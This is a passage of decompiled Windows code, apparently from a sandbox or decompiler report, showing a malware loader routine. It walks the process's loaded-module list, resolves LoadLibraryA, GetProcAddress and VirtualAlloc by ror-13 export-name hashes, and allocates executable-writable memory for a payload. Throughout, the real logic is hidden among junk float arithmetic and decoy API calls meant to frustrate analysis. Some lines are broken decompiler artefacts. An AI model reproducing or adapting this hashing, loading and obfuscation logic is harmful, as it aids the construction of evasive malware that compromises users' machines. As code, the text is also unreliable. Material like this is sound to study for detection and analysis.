				asm("movsd xmm0, [0x6f1c96c8]");
				_v236 = 0;
				_v316 = 0;
				_v200 = 0;
				_v320 = 0;
				_v128 = 0;
				_v284 = 0;
				_v68 = 0;
				asm("movsd [ebp-0x178], xmm0");
				asm("movsd [ebp-0x90], xmm0");
				__imp__GetTickCount64();
				__imp__GetTickCount64();
				_t430 = _v448;
				_v188 = _t430;
				_v332 = _t430;
				_t432 =  !=  ? _t841 : _t877;
				_v8 = 0;
				_t842 = _v448;
				_v44 =  !=  ? _t841 : _t877;
				while(1) {
					__imp__GetTickCount64();
					__imp__GetTickCount64();
					if( *_t842 != 0x5a4d) {
						goto L256;
					}
					_t678 =  *((intOrPtr*)(_t842 + 0x3c));
					_t434 = _t678 - 0x40;
					if(_t434 > 0x3bf) {
						goto L256;
					}
					_t679 = _t678 + _t842;
					_v36 = _t679;
					_v268 = _t679;
					if( *_t679 != 0x4550) {
						goto L256;
					}
					_t814 = _v44;
					_v8 = 0xffffffff;
					_t680 =  *[fs:0x30];
					asm("movss xmm0, [0x6f1c9774]");
					_v48 = _t680;
					_v240 = _t680;
					asm("movss [ebp-0xf8], xmm0");
					if(_t814 == _t877) {
						asm("movss xmm1, [0x6f1c96dc]");
						asm("movsd xmm2, [0x6f1c9610]");
						asm("movss [ebp-0x18], xmm0");
						asm("movss xmm0, [ebp-0x1c]");
						asm("ucomiss xmm0, xmm1");
						asm("movsd [ebp-0x34], xmm2");
						asm("movss [ebp-0xa0], xmm1");
						asm("lahf");
						__eflags = _t434 & 0x00000044;
						if((_t434 & 0x00000044) != 0) {
							L13:
							_v61 = 0x3f;
							_v28 = 0xb;
							_v88 = 0x15;
							goto L14;
							L18:
							asm("movss xmm0, [0x6f1c974c]");
							asm("comiss xmm1, xmm0");
							asm("movss [ebp-0x24], xmm1");
							asm("movss [ebp-0x1c], xmm1");
							asm("movss [ebp-0x48], xmm0");
							if(__eflags <= 0) {
								L21:
								_t843 = _v68;
								_t814 = _v44;
								goto L22;
							} else {
								_t874 = __imp__CoFreeUnusedLibraries;
								do {
									 *_t874();
									asm("cdq");
									_push(_t814);
									_push(0x6b);
									E6F185A30();
									asm("cvttsd2si esi, xmm0");
									_t914 = _t914 + 8;
									asm("movd xmm0, esi");
									asm("cvtdq2ps xmm0, xmm0");
									asm("comiss xmm0, [ebp-0x48]");
									asm("movss [ebp-0x1c], xmm0");
									asm("movss [ebp-0x24], xmm0");
								} while (__eflags > 0);
								goto L21;
							}
							L14:
							__imp__GetShellWindow();
							_v61 = E6F185EE0(_v61, _t814);
							asm("cdq");
							_push(_t814);
							_push(_v28);
							E6F185A30();
							_t914 = _t914 + 8;
							asm("cvttsd2si edx, xmm0");
							_t684 = _v88 * _t814;
							_v28 = _t814;
							_v88 = _t684;
							_v113 = _t814 - _t684;
							_t685 = _t684;
							_t441 = _t814;
							asm("cdq");
							_t814 = _t441 % _t685;
							_t443 = _t441 / _t685 * _v113;
							asm("movd xmm0, ecx");
							asm("cvtdq2ps xmm0, xmm0");
							asm("ucomiss xmm0, [ebp-0xa0]");
							asm("lahf");
							__eflags = _t441 / _t685 * _v113 & 0x00000044;
							if(__eflags != 0) {
								goto L14;
							} else {
								asm("comiss xmm0, [0x6f1c9730]");
								if(__eflags <= 0) {
									GetOEMCP();
									E6F1B8E30(E6F185D90(), _t445);
									asm("movss xmm2, [0x6f1c9560]");
									asm("xorps xmm1, xmm1");
									asm("cvtsd2ss xmm1, xmm0");
									asm("movss [ebp-0xa4], xmm2");
									asm("addss xmm1, xmm2");
								} else {
									asm("movss xmm0, [0x6f1c96f0]");
									_t668 = E6F1B8AFE(_t443);
									_push(_t814);
									_push(_t668);
									E6F185A30();
									asm("movss xmm1, [0x6f1c97b0]");
									_t914 = _t914 + 8;
									asm("cvtsd2ss xmm0, xmm0");
									asm("subss xmm1, xmm0");
									asm("movss xmm0, [0x6f1c9560]");
									asm("movss [ebp-0xa4], xmm0");
								}
								goto L18;
							}
						} else {
							asm("movsd xmm3, [0x6f1c95a0]");
							asm("movsd [ebp-0xc0], xmm3");
							do {
								asm("cvttsd2si ecx, xmm2");
								E6F185D90();
								asm("movsd xmm1, [ebp-0x34]");
								asm("movd xmm0, esi");
								asm("cvtdq2pd xmm0, xmm0");
								asm("subsd xmm1, xmm0");
								asm("movss xmm0, [ebp-0x18]");
								asm("movsd [ebp-0x34], xmm1");
								_t670 = E6F185C20(_t680, _t814);
								asm("movsd xmm2, [ebp-0x34]");
								asm("movaps xmm4, xmm0");
								asm("movd xmm1, esi");
								asm("cvtdq2pd xmm1, xmm1");
								asm("movsd xmm0, [ebp-0xc0]");
								asm("divsd xmm1, xmm2");
								asm("addsd xmm0, xmm2");
								asm("movss [ebp-0x18], xmm4");
								asm("cvttsd2si eax, xmm0");
								asm("xorps xmm0, xmm0");
								_t671 = _t670;
								asm("cvtss2sd xmm0, xmm4");
								asm("movd xmm3, eax");
								asm("cvtdq2pd xmm3, xmm3");
								asm("subsd xmm1, xmm0");
								asm("movsd [ebp-0xc0], xmm3");
								asm("addsd xmm1, xmm3");
								asm("cvtpd2ps xmm0, xmm1");
								asm("ucomiss xmm0, [ebp-0xa0]");
								asm("lahf");
								__eflags = _t671 & 0x00000044;
							} while ((_t671 & 0x00000044) != 0);
							goto L13;
						}
					} else {
						_t808 =  *(_t680 + 0xc);
						asm("movss xmm0, [0x6f1c96dc]");
						asm("movss xmm2, [0x6f1c9560]");
						_v48 = _t808;
						_t843 =  *((intOrPtr*)(_t808 + 0x14));
						_v240 = _t808;
						_v68 = _t843;
						asm("movss [ebp-0xa0], xmm0");
						asm("movss [ebp-0xa4], xmm2");
						L22:
						asm("xorps xmm0, xmm0");
						asm("movss [ebp-0x110], xmm0");
						asm("movss xmm0, [0x6f1c9760]");
						asm("movss [ebp-0x80], xmm0");
						asm("movsd xmm0, [0x6f1c95f8]");
						asm("movsd [ebp-0x150], xmm0");
						asm("movss xmm0, [0x6f1c97ac]");
						asm("movss [ebp-0xf4], xmm0");
						asm("movss xmm0, [0x6f1c9708]");
						asm("movss [ebp-0xcc], xmm0");
						asm("movss xmm0, [0x6f1c9728]");
						asm("movss [ebp-0x5c], xmm0");
						asm("movss xmm0, [0x6f1c9768]");
						asm("movss [ebp-0xc8], xmm0");
						asm("movss xmm0, [0x6f1c95c8]");
						asm("movss [ebp-0x120], xmm0");
						asm("movss xmm0, [0x6f1c9750]");
						asm("movss [ebp-0x104], xmm0");
						asm("movss xmm0, [0x6f1c96f8]");
						asm("movss [ebp-0x128], xmm0");
						asm("movss xmm0, [0x6f1c9794]");
						asm("movss [ebp-0x12c], xmm0");
						asm("movsd xmm0, [0x6f1c9588]");
						asm("movsd [ebp-0x180], xmm0");
						asm("movss xmm0, [0x6f1c96b8]");
						asm("movss [ebp-0x130], xmm0");
						asm("movss xmm0, [0x6f1c9720]");
						asm("movss [ebp-0x78], xmm0");
						asm("movsd xmm0, [0x6f1c95d8]");
						asm("movsd [ebp-0xc0], xmm0");
						asm("movss xmm0, [0x6f1c96e4]");
						asm("movss [ebp-0x100], xmm0");
						asm("movsd xmm0, [0x6f1c95a8]");
						asm("movsd [ebp-0x188], xmm0");
						asm("movss xmm0, [0x6f1c96ac]");
						asm("movss [ebp-0x18], xmm0");
						asm("movss xmm0, [0x6f1c9748]");
						asm("movss [ebp-0x140], xmm0");
						asm("movsd xmm0, [0x6f1c9600]");
						asm("movsd [ebp-0x168], xmm0");
						asm("movss xmm0, [0x6f1c978c]");
						asm("movss [ebp-0x144], xmm0");
						asm("movsd xmm0, [0x6f1c9580]");
						asm("movsd [ebp-0xb4], xmm0");
						asm("movss xmm0, [0x6f1c9714]");
						asm("movss [ebp-0xfc], xmm0");
						asm("movss xmm0, [0x6f1c975c]");
						asm("movss [ebp-0x154], xmm0");
						asm("movss xmm0, [0x6f1c96b4]");
						asm("movss [ebp-0x54], xmm0");
						asm("movss xmm0, [0x6f1c9718]");
						asm("movss [ebp-0x158], xmm0");
						asm("movss xmm0, [0x6f1c9784]");
						_v244 = _v296;
						asm("movss [ebp-0x15c], xmm0");
						asm("movss xmm0, [0x6f1c9578]");
						_v160 = _v92;
						asm("movss [ebp-0x160], xmm0");
						asm("movss xmm0, [0x6f1c9710]");
						_v152 = _v76;
						_v100 = _v312;
						asm("movss [ebp-0x114], xmm0");
						while(_t843 != 0) {
							while(1) {
								_v104 = _t580;
								if(_t580 == 0) {
									break;
								}
								if(_t814 + 4 <= _v60) {
									asm("comiss xmm1, xmm2");
									if(__eflags < 0) {
										asm("pause");
										_t640 = E6F1B8E30(E6F185D90(), _t639);
										asm("movaps xmm1, xmm0");
										asm("xorps xmm2, xmm2");
										asm("mulsd xmm0, [ebp-0x150]");
										asm("mulsd xmm1, [ebp-0xd4]");
										asm("divsd xmm1, xmm0");
										asm("movss xmm0, [ebp-0xf4]");
										asm("cvtsd2ss xmm2, xmm1");
										asm("comiss xmm0, xmm2");
										asm("movss [ebp-0x1c], xmm2");
										asm("movss [ebp-0x24], xmm2");
										if(__eflags < 0) {
											goto L33;
										}
										goto L32;
									} else {
										GetCommandLineW();
										L32:
										_t661 = E6F185EE0(0x21, _t814);
										asm("cdq");
										_t640 = E6F1B8E30(E6F1B8160(_t661, _t814, 0x2c, 0), _t663);
										asm("xorps xmm2, xmm2");
										asm("cvtsd2ss xmm2, xmm0");
										asm("movss [ebp-0x1c], xmm2");
										asm("movss [ebp-0x24], xmm2");
										L33:
										asm("ucomiss xmm2, [ebp-0xcc]");
										asm("lahf");
										__eflags = _t640 & 0x00000044;
										if(__eflags == 0) {
											EmptyClipboard();
											asm("movss xmm2, [ebp-0xa4]");
											asm("movss [ebp-0x1c], xmm2");
											asm("movss [ebp-0x24], xmm2");
										}
										goto L35;
									}
								} else {
									_t814 = 0xd;
									_t665 = E6F188A10(_t868, 0xd, _t904);
									asm("movss xmm2, [ebp-0x1c]");
									_t868 = _t665;
									L35:
									_t802 =  *_t904;
									if(_t802 < 0x61) {
										_t838 = _v44;
										__eflags = _t838 - _v156;
										_t642 =  !=  ? _t838 : _v112;
										_v8 = 0xffffffff;
										_t814 =  !=  ? _t838 : _v112;
										_v44 = _t814;
										L39:
										_t868 = _t868 + (_t802 & 0x000000ff);
										if(_t814 == _v60) {
											asm("comiss xmm2, [ebp-0x120]");
											if(__eflags >= 0) {
												asm("movss xmm0, [ebp-0x5c]");
												E6F185C20(_t802, _t814);
												asm("cvttss2si esi, xmm0");
												asm("movss xmm0, [ebp-0x5c]");
												E6F185C20(_t802, _t814);
												asm("movd xmm1, esi");
												asm("cvtdq2ps xmm1, xmm1");
												asm("cvttss2si ecx, xmm0");
												asm("movss [ebp-0x30], xmm0");
												asm("movss [ebp-0x1c], xmm1");
												E6F185EE0(_t802, _t814);
												asm("movss xmm1, [ebp-0x30]");
												asm("movss xmm2, [ebp-0x1c]");
												_t904 = _v72;
												asm("movd xmm0, eax");
												asm("cvtdq2ps xmm0, xmm0");
												_t814 = _v44;
												asm("divss xmm1, xmm0");
												asm("subss xmm2, xmm1");
												asm("movss [ebp-0x1c], xmm2");
												asm("movss [ebp-0x24], xmm2");
											}
											asm("movss xmm1, [ebp-0x80]");
											_t580 = _v104 + 0xffff;
										} else {
											_t904 = _t904 + 1;
											asm("movss xmm1, [ebp-0x80]");
											_t580 = _v104 + 0xffff;
											_v72 = _t904;
										}
										continue;
									}
									asm("cdq");
									_t651 = _v44 - _t814 >> 1;
									if(_v44 - _t814 >> 1 < _v60) {
										asm("movss xmm1, [0x6f1c96f4]");
										asm("movsd xmm3, [0x6f1c95b8]");
										asm("movss xmm0, [0x6f1c9734]");
										asm("movss [ebp-0x4c], xmm1");
										asm("movsd xmm1, [0x6f1c9628]");
										asm("movsd [ebp-0x90], xmm1");
										asm("movss xmm1, [0x6f1c9764]");
										asm("movss [ebp-0x84], xmm1");
										asm("movss xmm1, [0x6f1c9564]");
										asm("movsd [ebp-0xc0], xmm3");
										asm("movss [ebp-0x80], xmm0");
										asm("movss [ebp-0x108], xmm1");
										while(1) {
											_t873 = 0;
											__eflags = 0;
											asm("movsd [ebp-0xac], xmm3");
											asm("comiss xmm0, xmm2");
											_t910 = 0x32;
											if(0 < 0) {
												goto L48;
											}
											_t839 = 0;
											_t806 = 0x32;
											E6F1B8E30(_t651, 0x32);
											asm("movsd xmm1, [ebp-0xac]");
											asm("movaps xmm2, xmm0");
											asm("movsd [ebp-0x150], xmm2");
											do {
												asm("cvtpd2ps xmm0, xmm1");
												_t654 = E6F185C20(_t806, _t839);
												_t839 = _t873;
												asm("movss [ebp-0x64], xmm0");
												_t655 = E6F1B8E30(_t654, _t910);
												asm("movss xmm2, [ebp-0x64]");
												asm("cvtsd2ss xmm0, xmm0");
												asm("movaps xmm1, xmm2");
												asm("subss xmm1, xmm0");
												asm("cvtps2pd xmm0, xmm2");
												asm("movss [ebp-0x30], xmm1");
												asm("movsd xmm1, [ebp-0xac]");
												asm("addsd xmm1, [ebp-0x150]");
												asm("divsd xmm0, xmm1");
												asm("movsd [ebp-0xac], xmm1");
												_t656 = E6F1B8CDF(_t655);
												_t910 = _t656;
												_t806 = _t656;
												E6F1B8E30(_t656, _t656);
												asm("movsd xmm1, [ebp-0xac]");
												asm("movaps xmm2, xmm0");
												asm("movss xmm0, [ebp-0x30]");
												asm("addss xmm0, [ebp-0x64]");
												asm("movsd [ebp-0x150], xmm2");
												asm("cvtps2pd xmm0, xmm0");
												asm("addsd xmm0, xmm1");
												asm("addsd xmm0, xmm2");
												asm("movss xmm2, [ebp-0x80]");
												asm("cvtpd2ps xmm0, xmm0");
												asm("comiss xmm2, xmm0");
											} while (__eflags >= 0);
											L48:
											asm("movss xmm0, [0x6f1c9730]");
											asm("movss [ebp-0x64], xmm0");
											do {
												__imp__GetCurrentProcessorNumber();
												asm("movss xmm0, [ebp-0x64]");
												_t652 = E6F185C20(_t802, _t814);
												asm("movss xmm1, [ebp-0x4c]");
												asm("cvtss2sd xmm0, xmm0");
												asm("cvtsd2ss xmm0, xmm0");
												asm("comiss xmm1, xmm0");
												asm("movss [ebp-0x64], xmm0");
											} while (__eflags > 0);
											asm("movss xmm2, [ebp-0xcc]");
											asm("movsd xmm1, [ebp-0x90]");
											asm("ucomiss xmm0, xmm2");
											asm("lahf");
											__eflags = _t652 & 0x00000044;
											if(__eflags != 0) {
												L52:
												asm("comiss xmm0, [ebp-0x84]");
												if(__eflags <= 0) {
													asm("movss xmm0, [0x6f1c9788]");
													_t651 = E6F185C20(_t802, _t814);
													asm("movss xmm2, [ebp-0x110]");
													asm("subss xmm2, xmm0");
												} else {
													_t802 = 1;
													_t659 = E6F185D90();
													asm("movss xmm2, [ebp-0x108]");
													_t651 = _t659;
													asm("movd xmm0, eax");
													asm("cvtdq2ps xmm0, xmm0");
													asm("divss xmm2, xmm0");
													asm("subss xmm2, [0x6f1c97b4]");
												}
												asm("comiss xmm2, [ebp-0x5c]");
												asm("movss xmm0, [ebp-0x80]");
												asm("movsd xmm3, [ebp-0xc0]");
												if(__eflags > 0) {
													asm("movss xmm0, [ebp-0xc8]");
													_t658 = E6F185C20(_t802, _t814);
													asm("cvttss2si eax, xmm0");
													asm("movsd xmm3, [ebp-0xc0]");
													_t651 = _t658 * 0xffffffe8;
													asm("movd xmm0, eax");
													asm("cvtdq2pd xmm0, xmm0");
													asm("cvtpd2ps xmm2, xmm0");
													asm("movss xmm0, [ebp-0x80]");
												}
												continue;
											} else {
												goto L51;
											}
											do {
												L51:
												asm("movaps xmm0, xmm1");
												asm("mulsd xmm1, xmm0");
												asm("xorps xmm0, xmm0");
												asm("cvtsd2ss xmm0, xmm1");
												asm("ucomiss xmm0, xmm2");
												asm("lahf");
												__eflags = _t652 & 0x00000044;
											} while (__eflags != 0);
											goto L52;
										}
									} else {
										_t814 = _v44;
										_t868 = _t868 + 0xffffffe0;
										goto L39;
									}
								}
							}
							_t905 = _v60;
							__eflags = _t868 - 0x6a4abc5b;
							if(_t868 != 0x6a4abc5b) {
								L112:
								__eflags = _v236;
								if(__eflags == 0) {
									L126:
									_t843 =  *_v68;
									_v68 = _t843;
									continue;
								}
								__eflags = _v200;
								if(__eflags == 0) {
									goto L126;
								}
								__eflags = _v128;
								if(__eflags == 0) {
									goto L126;
								}
								__eflags = _t814 - _t905;
								if(__eflags > 0) {
									_t814 = 0x91afca54;
									E6F188A50(0x91afca54);
									_t772 =  *((intOrPtr*)(_v36 + 0x50)) + 0xc;
									__eflags = _t772;
									_t582 = VirtualAlloc(0, _t772, 0x3000, 0x40); // executed
									_v48 = _t582;
									break;
								}
								asm("movss xmm0, [ebp-0x1c]");
								asm("o16 nop [eax+eax]");
								L117:
								asm("comiss xmm0, [0x6f1c9798]");
								if(__eflags > 0) {
									_t580 = E6F1B8E30(_t580, 0x32);
									asm("cvtsd2ss xmm0, xmm0");
								}
								goto L117;
							}
							__eflags = _t814 - _t905;
							if(_t814 <= _t905) {
								__eflags = _v120;
								if(_v120 <= 0) {
									goto L112;
								}
								_t583 = _v160;
								_t774 = _v152;
								_t906 = _v48;
								while(1) {
									L63:
									_v92 = _t583;
									_t870 = _t774;
									_v76 = _t870;
									_t775 =  *_t583 + _t906;
									_t907 = 0;
									__eflags = 0;
									_t585 =  *_t775;
									do {
										L64:
										asm("ror esi, 0xd");
										_t775 = _t775 + 1;
										_t907 = _t907 + _t585;
										_t585 =  *_t775;
										__eflags = _t585;
									} while (_t585 != 0);
									_v52 = _t907;
									__eflags = _t907 - 0xec0e4e8e;
									if(_t907 == 0xec0e4e8e) {
										L68:
										_t776 = _v60;
										_t871 = _t814;
										__eflags = _t814 - _t776;
										if(_t814 <= _t776) {
											L84:
											_t872 = _v48;
											_t777 = _v100;
											L85:
											__eflags = _t907 - 0xec0e4e8e;
											if(_t907 != 0xec0e4e8e) {
												__eflags = _t907 - 0x7c0dfcaa;
												if(_t907 != 0x7c0dfcaa) {
													__eflags = _t907 - 0x91afca54;
													if(_t907 == 0x91afca54) {
														__eflags = _t814 - _v60;
														if(_t814 > _v60) {
															_t589 =  *_t777 + _t872;
															__eflags = _t589;
															_v128 = _t589;
															_v284 = _t589;
														}
													}
													L109:
													_t194 =  &_v120;
													 *_t194 = _v120 + 0xffff;
													__eflags =  *_t194;
													_t814 = _v44;
													_t870 = _v76;
													L110:
													__eflags = _t814 - _v288;
													_t774 =  <=  ? _t870 :  &(_t870[1]);
													_v152 = _t774;
													_t583 =  <=  ? _v92 : _v92 + 4;
													__eflags = _v120;
													_t906 = _v48;
													if(_v120 > 0) {
														asm("movss xmm2, [ebp-0x1c]");
														L63:
														_v92 = _t583;
														_t870 = _t774;
														_v76 = _t870;
														_t775 =  *_t583 + _t906;
														_t907 = 0;
														__eflags = 0;
														_t585 =  *_t775;
														goto L64;
													}
													_t905 = _v60;
													_v160 = _t583;
													_v92 = _t583;
													_v152 = _t774;
													_v76 = _t774;
													goto L112;
												}
												asm("cdq");
												_t592 = _t814 - _t814 >> 1;
												__eflags = _t592 - _v60;
												if(__eflags < 0) {
													asm("comiss xmm2, [ebp-0x100]");
													asm("movsd xmm1, [ebp-0xc0]");
													asm("movsd [ebp-0x34], xmm1");
													if(__eflags < 0) {
														L95:
														asm("movss xmm0, [ebp-0xc8]");
														asm("comiss xmm0, xmm2");
														if(__eflags >= 0) {
															GetSystemDefaultLangID();
															asm("movss xmm0, [ebp-0x18]");
															E6F185C20(_t777, _t814);
															asm("xorps xmm1, xmm1");
															asm("cvtss2sd xmm1, xmm0");
															asm("movsd [ebp-0x34], xmm1");
															_t608 = E6F1B8E30(E6F185D90(), _t607);
															asm("movsd [ebp-0x50], xmm0");
															_t609 = E6F1B8CDF(_t608);
															_push(_t814);
															_push(_t609);
															E6F185A30();
															asm("movsd xmm1, [ebp-0x34]");
															_t914 = _t914 + 8;
															asm("divsd xmm1, [ebp-0x50]");
															_t814 = 0;
															_t777 = 0xc4;
															asm("cvttsd2si eax, xmm0");
															asm("movd xmm0, eax");
															asm("cvtdq2pd xmm0, xmm0");
															asm("divsd xmm1, xmm0");
															asm("movsd [ebp-0x34], xmm1");
															_t592 = E6F1B8E30(_t609, 0xc4);
															asm("movsd xmm1, [ebp-0x34]");
															asm("addsd xmm1, xmm0");
															asm("cvtpd2ps xmm2, xmm1");
														}
														asm("ucomiss xmm2, [ebp-0xa0]");
														asm("lahf");
														__eflags = _t592 & 0x00000044;
														if((_t592 & 0x00000044) == 0) {
															asm("movss xmm0, [ebp-0x140]");
															E6F185C20(_t777, _t814);
															asm("cvtss2sd xmm0, xmm0");
															asm("movsd [ebp-0x50], xmm0");
															asm("mulsd xmm0, [ebp-0x168]");
															asm("cvttsd2si esi, xmm0");
															E6F1B8E30(E6F185EE0(0x71, _t814), _t603);
															asm("cvtsd2ss xmm0, xmm0");
															asm("movss [ebp-0x30], xmm0");
															asm("movss xmm0, [ebp-0x144]");
															_t592 = E6F185C20(_t603, _t814);
															asm("movsd xmm1, [ebp-0x50]");
															asm("cvttss2si eax, xmm0");
															asm("xorps xmm0, xmm0");
															asm("cvtsi2sd xmm0, esi");
															asm("divsd xmm1, xmm0");
															asm("movss xmm0, [ebp-0x30]");
															asm("cvtps2pd xmm0, xmm0");
															asm("divsd xmm1, xmm0");
															asm("xorps xmm0, xmm0");
															asm("cvtsi2sd xmm0, eax");
															asm("addsd xmm1, xmm0");
															asm("cvtpd2ps xmm2, xmm1");
														}
														asm("ucomiss xmm2, [ebp-0xfc]");
														asm("movsd xmm3, [ebp-0xb4]");
														asm("lahf");
														__eflags = _t592 & 0x00000044;
														if(__eflags != 0) {
															L101:
															asm("movss xmm0, [ebp-0x154]");
															asm("comiss xmm0, xmm2");
															if(__eflags < 0) {
																E6F1B8E30(E6F185D90(), _t593);
																asm("xorps xmm1, xmm1");
																asm("cvtsd2ss xmm1, xmm0");
																asm("movss xmm0, [ebp-0x158]");
																asm("divss xmm0, xmm1");
																asm("movss [ebp-0x1c], xmm1");
																asm("movss [ebp-0x30], xmm0");
																_t595 = E6F185D90();
																asm("movss xmm0, [ebp-0x15c]");
																asm("divss xmm0, [ebp-0x30]");
																_t596 = _t595;
																asm("movss xmm1, [ebp-0x1c]");
																asm("subss xmm1, xmm0");
																asm("movd xmm0, eax");
																asm("cvtdq2ps xmm0, xmm0");
																asm("addss xmm1, xmm0");
															} else {
																_t601 = E6F185EE0(0x33, _t814);
																asm("movss xmm1, [ebp-0x54]");
																_t596 = _t601;
																asm("movd xmm0, eax");
																asm("cvtdq2ps xmm0, xmm0");
																asm("divss xmm1, xmm0");
																asm("addss xmm1, [ebp-0x110]");
															}
															asm("ucomiss xmm1, [ebp-0x160]");
															asm("movss [ebp-0x24], xmm1");
															asm("movss [ebp-0x1c], xmm1");
															asm("lahf");
															__eflags = _t596 & 0x00000044;
															if((_t596 & 0x00000044) == 0) {
																E6F1B8E30(_t596, 0x12);
																asm("cvtsd2ss xmm0, xmm0");
																asm("addss xmm0, [ebp-0x114]");
																asm("movss [ebp-0x4c], xmm0");
																_v52 = E6F185EE0(0x47, 0);
																E6F1B8E30(E6F185EE0(_t598, 0), _t599);
																asm("movd xmm1, dword [ebp-0x30]");
																asm("cvtdq2ps xmm1, xmm1");
																asm("cvtsd2ss xmm0, xmm0");
																asm("addss xmm1, [ebp-0x4c]");
																asm("addss xmm1, xmm0");
																asm("movss [ebp-0x1c], xmm1");
																asm("movss [ebp-0x24], xmm1");
															}
															goto L109;
														} else {
															do {
																asm("movaps xmm0, xmm3");
																_t592 = E6F1B8CDF(_t592);
																_push(_t814);
																_push(_t592);
																E6F185A30();
																asm("movaps xmm3, xmm0");
																asm("xorps xmm2, xmm2");
																asm("mulsd xmm0, xmm3");
																asm("movaps xmm1, xmm3");
																_t914 = _t914 + 8;
																asm("cvttsd2si eax, xmm0");
																asm("movd xmm0, eax");
																asm("cvtdq2pd xmm0, xmm0");
																asm("subsd xmm1, xmm0");
																asm("cvtsd2ss xmm2, xmm1");
																asm("ucomiss xmm2, [ebp-0xfc]");
																asm("lahf");
																__eflags = _t592 & 0x00000044;
															} while (__eflags != 0);
															goto L101;
														}
													}
													asm("movss xmm0, [ebp-0x104]");
													asm("movss [ebp-0x64], xmm0");
													asm("movsd xmm0, [ebp-0x188]");
													asm("movsd [ebp-0x50], xmm0");
													do {
														EmptyClipboard();
														asm("movss xmm0, [ebp-0x64]");
														E6F185C20(_t777, _t814);
														asm("cvttsd2si ecx, [ebp-0x34]");
														asm("movss [ebp-0x9c], xmm0");
														asm("movsd xmm0, [ebp-0x34]");
														asm("addsd xmm0, [ebp-0x50]");
														asm("cvttsd2si esi, xmm0");
														_t777 = E6F185D90();
														E6F1B8E30(_t612, _t612);
														asm("movsd [ebp-0x34], xmm0");
														asm("movss xmm0, [ebp-0x9c]");
														_t592 = E6F185C20(_t612, _t814);
														asm("movd xmm1, esi");
														asm("cvttss2si eax, xmm0");
														asm("movss xmm0, [ebp-0x9c]");
														asm("cvtdq2ps xmm1, xmm1");
														asm("movd xmm2, eax");
														asm("subss xmm0, xmm1");
														asm("movss [ebp-0x64], xmm1");
														asm("cvtdq2pd xmm2, xmm2");
														asm("cvtps2pd xmm0, xmm0");
														asm("movsd [ebp-0x50], xmm2");
														asm("addsd xmm0, [ebp-0x34]");
														asm("addsd xmm0, xmm2");
														asm("cvtpd2ps xmm2, xmm0");
														asm("comiss xmm2, [ebp-0x100]");
													} while (__eflags >= 0);
													goto L95;
												}
												_t615 =  *_t777 + _t872;
												_v200 = _t615;
												_v320 = _t615;
												goto L109;
											}
											__eflags = _t814 - _v60;
											if(_t814 > _v60) {
												_t617 =  *_t777 + _t872;
												_v236 = _t617;
												_v316 = _t617;
											}
											goto L109;
										}
										_t618 = _t814 + _t814;
										_v136 = _t618;
										while(1) {
											_v80 = _t871;
											__eflags = _t618 - _t776;
											if(_t618 >= _t776) {
												break;
											}
											asm("ucomiss xmm2, [ebp-0x104]");
											asm("lahf");
											__eflags = _t618 & 0x00000044;
											if(__eflags == 0) {
												_t632 = TlsAlloc();
												_t814 = 0;
												__eflags = 0;
												E6F1B8E30(_t632, 0x126);
												asm("cvtsd2ss xmm0, xmm0");
												asm("cvttss2si ecx, xmm0");
												E6F185D90();
											}
											asm("movss xmm1, [ebp-0x128]");
											do {
												asm("movd xmm0, eax");
												_t623 = 1;
												asm("cvtdq2ps xmm0, xmm0");
												asm("divss xmm1, xmm0");
												asm("comiss xmm1, [ebp-0x12c]");
											} while (__eflags >= 0);
											asm("ucomiss xmm1, [ebp-0xf4]");
											asm("lahf");
											__eflags = 0;
											if(0 != 0) {
												E6F1B8E30(E6F185EE0(4, _t814), _t624);
												asm("movsd [ebp-0x68], xmm0");
												asm("cvtsd2ss xmm0, xmm0");
												_t626 = E6F185C20(_t624, _t814);
												asm("cvttss2si eax, xmm0");
												asm("movsd xmm0, [ebp-0x180]");
												_t623 = _t626;
												asm("movd xmm1, eax");
												asm("cvtdq2pd xmm1, xmm1");
												asm("mulsd xmm1, [ebp-0x68]");
												asm("subsd xmm0, xmm1");
											} else {
												asm("movsd xmm0, [ebp-0xd4]");
												asm("divsd xmm0, xmm0");
											}
											asm("cvtpd2ps xmm2, xmm0");
											asm("movss xmm0, [ebp-0x130]");
											asm("ucomiss xmm2, [ebp-0x78]");
											asm("movss [ebp-0x44], xmm0");
											asm("movss xmm0, [ebp-0xf8]");
											asm("lahf");
											asm("movss [ebp-0x24], xmm2");
											asm("movss [ebp-0x1c], xmm2");
											asm("movss [ebp-0x64], xmm0");
											__eflags = _t623 & 0x00000044;
											if((_t623 & 0x00000044) != 0) {
												L82:
												_t871 = _t871 + 1;
												__eflags = _v80 - _v112;
												_t618 = _v136;
												_t776 = _v60;
												if(_v80 >= _v112) {
													continue;
												}
												_t814 = _v44;
												goto L84;
											} else {
												_t909 = __imp__CoFreeUnusedLibraries;
												do {
													_t628 =  *_t909();
													asm("movss xmm0, [ebp-0x64]");
													asm("divss xmm0, [ebp-0x44]");
													E6F1B8E30(E6F1B8AFE(_t628), _t629);
													asm("movss xmm1, [ebp-0x44]");
													asm("cvtsd2ss xmm0, xmm0");
													asm("addss xmm1, xmm0");
													asm("movss [ebp-0x1c], xmm0");
													asm("movaps xmm0, xmm1");
													asm("movss [ebp-0x44], xmm1");
													_t631 = E6F185C20(_t629, _t814);
													asm("movss xmm2, [ebp-0x1c]");
													asm("subss xmm2, [ebp-0x44]");
													asm("movss [ebp-0x64], xmm0");
													asm("addss xmm2, xmm0");
													asm("ucomiss xmm2, [ebp-0x78]");
													asm("movss [ebp-0x1c], xmm2");
													asm("movss [ebp-0x24], xmm2");
													asm("lahf");
													__eflags = _t631 & 0x00000044;
												} while ((_t631 & 0x00000044) != 0);
												_t907 = _v52;
												goto L82;
											}
										}
										_t872 = _v48;
										_t814 = _v44;
										_t777 =  *((intOrPtr*)(_v244 + 0x1c)) + ( *_v152 & 0x0000ffff) * 4 + _t872;
										_v100 = _t777;
										_v312 = _t777;
										goto L85;
									}
									__eflags = _t907 - 0x7c0dfcaa;
									if(_t907 == 0x7c0dfcaa) {
										goto L68;
									}
									__eflags = _t907 - 0x91afca54;
									if(_t907 != 0x91afca54) {
										goto L110;
									}
									goto L68;
								}
							}
							_v120 = 3;
							_t906 =  *(_v68 + 0x10);
							_v48 = _t906;
							_v240 = _t906;
							_t797 =  *((intOrPtr*)( *((intOrPtr*)(_t906 + 0x3c)) + _t906 + 0x78));
							_t798 = _t797 + _t906;
							_v244 = _t798;
							_t583 =  *((intOrPtr*)(_t797 + _t906 + 0x20)) + _t906;
							_v296 = _t798;
							_t774 =  *((intOrPtr*)(_t798 + 0x24)) + _t906;
							_v152 = _t774;
							goto L63;
						}
						_t879 = 1;
						do {
							__imp__GetTickCount64();
							asm("movsd xmm1, [ebp-0x178]");
